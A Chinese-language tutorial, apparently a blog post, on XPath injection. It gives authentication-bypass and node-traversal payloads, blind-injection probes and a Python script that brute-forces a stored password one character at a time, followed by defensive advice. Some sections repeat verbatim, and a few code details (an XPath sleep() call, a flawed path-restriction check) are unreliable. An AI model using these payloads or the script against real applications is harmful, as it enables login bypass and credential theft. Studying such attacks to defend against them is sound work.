Xpath注入

Xpath注入学习和分析

XPath 是一种可以访问 XML 文件中的节和内容的查询语言。

快速获取 Xpath

就是手动获取

现代浏览器都支持这个 Xpath 路径复制

有这个完整和相对的这个区别

利用工具

一些浏览器插件之类工具调用获取

效果如上

验证

$x 函数

1
$x(xpathExpression, [contextNode])

比如我们获取到一段 Xpath 表达式

1
//*[@id='16858669']/div/h2/a

在控制台可以利用$x函数

1
// 验证XPath是否能找到元素
2
$x("//*[@id='16858669']/div/h2/a")
3

4
// 查看找到多少个元素
5
$x("//*[@id='16858669']/div/h2/a").length
6

7
// 获取元素的文本内容
8
$x("//*[@id='16858669']/div/h2/a")[0]?.textContent
9

10
// 获取元素的链接地址
11
$x("//*[@id='16858669']/div/h2/a")[0]?.href
12

13
// 高亮显示找到的元素
14
$x("//*[@id='16858669']/div/h2/a")[0]?.scrollIntoView()
15
$x("//*[@id='16858669']/div/h2/a")[0]?.style.border = "3px solid red"

效果如下

直接返回这个元素的所有信息

Xpath 语法

常用的语法

选择直接子节点
// 选择任意位置的后代节点
@ 选择属性
[] - 谓语，用于筛选条件

常用函数

1
# 字符串函数
2
string-length(), substring(), starts-with(), contains()
3
normalize-space(), translate(), concat()
4

5
# 数学函数
6
count(), sum(), number(), round(), floor(), ceiling()
7

8
# 节点函数
9
name(), local-name(), namespace-uri()
10
position(), last()

一个 xml 文件如下

1
<bookstore>
2
  <book id="1" category="fiction">
3
    <title>Harry Potter</title>
4
    <author>J.K. Rowling</author>
5
    <price>29.99</price>
6
  </book>
7
  <book id="2" category="technical">
8
    <title>Learning XML</title>
9
    <author>Erik T. Ray</author>
10
    <price>39.95</price>
11
  </book>
12
</bookstore>

查询如下

1
/bookstore/book                    # 选择所有书籍
2
//title                           # 选择所有标题
3
/bookstore/book[1]                # 选择第一本书
4
//book[@category='fiction']       # 选择类别为fiction的书
5
//book[price>30]                  # 选择价格大于30的书
6
//book/title/text()               # 选择所有书籍标题的文本内容
7
//@category                       # 选择所有category属性

Xpath 注入

原理如下

接受参数username和password

1
# 用户输入
2
username = input("username")
3
password = input("password")
4

5
# 构造 XPath 查询
6
query = f"//user[username/text()='{username}' and password/text()='{password}']"
7

8
# XML 示例数据
9
<users>
10
    <user>
11
        <username>admin</username>
12
        <password>admin123</password>
13
    </user>
14
</users>

重点在于查询语句

1
query = f"//user[username/text()='{username}' and password/text()='{password}']"

如果我们巧妙构造

1
用户名：' or '1'='1
2
密码：' or '1'='1

然后查询语句就如下

1
//user[username/text()='' or '1'='1' and password/text()='' or '1'='1']

恒为真，匹配到所有用户，造成 认证绕过！恒为真，匹配到所有用户，造成 认证绕过！

但是 Xpath 的匹配还是比较严格的

还有一些绕过技巧

1
# 注释绕过
2
' or '1'='1' (: comment :) and '1'='1
3

4
# 编码绕过
5
&#39; or &#39;1&#39;=&#39;1&#39; and &#39;1&#39;=&#39;1
6

7
# 大小写绕过
8
' OR '1'='1' AND '1'='1

如图片所示

节点遍历技术

使用特殊的XPath表达式可以遍历整个XML文档：

1
# 获取所有节点
2
']|//*|//*['
3

4
# 获取所有属性
5
']|//@*|//*['

就是构造

1
//user[username/text()='']|//*|//*[password/text()='123']

命名空间绕过

什么是空间命名

1
<root xmlns:a="http://example.com/a" xmlns:b="http://example.com/b">
2
  <a:user>admin</a:user>
3
  <b:user>guest</b:user>
4
</root>

分别属于 a 和 b 命名空间

就是说在XPath 查询时，如果不指定命名空间，就找不到这些元素

所以我们手段就如下

有些XML文档使用命名空间，可以通过以下方式绕过：

local-name() 是 XPath 中的函数，返回不含命名空间前缀的标签名。

1
# 使用local-name()函数绕过命名空间限制
2
' or local-name()='user' or '1'='1

我们可以尝尝把 Xpath 和 sql 对比起来分析学习

XPath 注入和SQL 注入相比如下

比较点	XPath 注入	SQL 注入
目标	XML 数据库 / XML 文档	关系型数据库（MySQL、PostgreSQL）
语言	XPath	SQL
特征	查询节点路径、属性、文本等	查询表、字段、值等
利用方式	猜解节点、读取 XML 数据	获取数据、执行命令、控制数据库

XPath 盲注技术

盲注原理:

大多数情况下，当服务器返回数据时，会对错误信息进行过滤，不会直接显示在用户页面上。但即使错误信息被过滤，攻击者仍然可以通过服务器的不同响应来判断查询结果。

盲注是一种在服务器不返回详细错误信息的情况下进行的注入技术。XPath盲注主要利用XPath的字符串操作函数和运算符，通过服务器的不同响应来推断信息。

盲注技术示例

假设有一个登录系统，使用以下XPath查询：

1
query = f"//user[username/text()='{username}' and password/text()='{password}']"

布尔盲注

通过构造返回布尔值的查询语句，逐位猜解数据：

1
# 判断第一个用户的密码长度是否大于5
2
' and string-length(//user[1]/password/text()) > 5 and '1'='1
3

4
# 判断第一个用户的密码第一个字符是否为'a'
5
' and substring(//user[1]/password/text(),1,1)='a' and '1'='1

时间盲注

某些XPath实现支持延时函数

1
# 如果条件成立，执行耗时操作
2
' and (if(substring(//user[1]/password/text(),1,1)='a', sleep(5), false)) and '1'='1

自动化盲注工具

可以编写脚本自动化盲注过程，例如：

1
import requests
2
import time
3

4
def xpath_blind(url, xpath_param):
5
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
6
    result = ""
7
    pos = 1
8

9
    # 先确定长度
10
    length = 0
11
    for i in range(1, 30):
12
        payload = f"' and string-length(//user[1]/password/text())={i} and '1'='1"
13
        r = requests.get(url, params={xpath_param: payload})
14
        if "登录成功" in r.text:
15
            length = i
16
            break
17

18
    print(f"Password length: {length}")
19

20
    # 逐位猜解
21
    for i in range(1, length+1):
22
        for char in charset:
23
            payload = f"' and substring(//user[1]/password/text(),{i},1)='{char}' and '1'='1"
24
            r = requests.get(url, params={xpath_param: payload})
25
            if "登录成功" in r.text:
26
                result += char
27
                print(f"Found character at position {i}: {char}")
28
                break
29

30
    return result

节点遍历技术

使用特殊的XPath表达式可以遍历整个XML文档：

1
# 获取所有节点
2
']|//*|//*['
3

4
# 获取所有属性
5
']|//@*|//*['

命名空间绕过

什么是空间命名

1
<root xmlns:a="http://example.com/a" xmlns:b="http://example.com/b">
2
  <a:user>admin</a:user>
3
  <b:user>guest</b:user>
4
</root>

分别属于 a 和 b 命名空间

就是说在XPath 查询时，如果不指定命名空间，就找不到这些元素

所以我们手段就如下

有些XML文档使用命名空间，可以通过以下方式绕过：

local-name() 是 XPath 中的函数，返回不含命名空间前缀的标签名。

1
# 使用local-name()函数绕过命名空间限制
2
' or local-name()='user' or '1'='1

防御策略与分析

这里以 Python 代码为例子

Python示例 - 安全的XPath查询

某些XPath库支持参数化查询，类似于SQL的预处理语句：

1
import xml.etree.ElementTree as ET
2
import re
3

4
def safe_xpath_query(username, password):
5
    # 1. 输入验证与过滤
6
    if not re.match(r'^[a-zA-Z0-9_]+$', username):
7
        return None
8

9
    # 2. 参数化查询（如果XPath处理器支持）
10
    # xpath = f"//user[@username='{username}' and @password='{password}']"
11

12
    # 或使用XML DOM安全查询
13
    root = ET.parse('users.xml').getroot()
14
    for user in root.findall('user'):
15
        if (user.get('username') == username and
16
            user.get('password') == password):
17
            return user
18
    return None

最后一种防御就是

XML 当作树 → 直接取属性 → 不走字符串 → 天生安全。

使用ORM框架

对于XML数据，

使用专门的ORM框架可以减少直接编写XPath查询的需要

1
# 使用XML ORM框架示例
2
from xmlorm import XMLModel, Field
3

4
class User(XMLModel):
5
    username = Field()
6
    password = Field()
7

8
# 安全查询
9
user = User.query.filter(User.username == username,
10
                        User.password == password).first()

最小权限原则

确保XML处理代码只有必要的最小权限：

1
# 限制XPath查询只能访问特定节点
2
def restricted_xpath_query(query, allowed_paths):
3
    # 检查查询是否只访问允许的路径
4
    for path in allowed_paths:
5
        if not query.startswith(path):
6
            return None
7
    # 执行查询...

参考文章

XPath 注入指北

XPath注入：攻击与防御技术-腾讯云开发者社区-腾讯云

xpath注入详解 - 渗透测试中心 - 博客园

Xpath注入攻击及其防御技术研究-阿里云开发者社区

Xpath注入学习和分析

Table of Contents

Xpath注入学习和分析

快速获取 Xpath

验证

Xpath 语法

Xpath 注入

节点遍历技术

命名空间绕过

什么是空间命名

XPath 盲注技术

盲注技术示例

布尔盲注

时间盲注

自动化盲注工具

节点遍历技术

命名空间绕过

什么是空间命名

防御策略与分析

使用ORM框架

最小权限原则

参考文章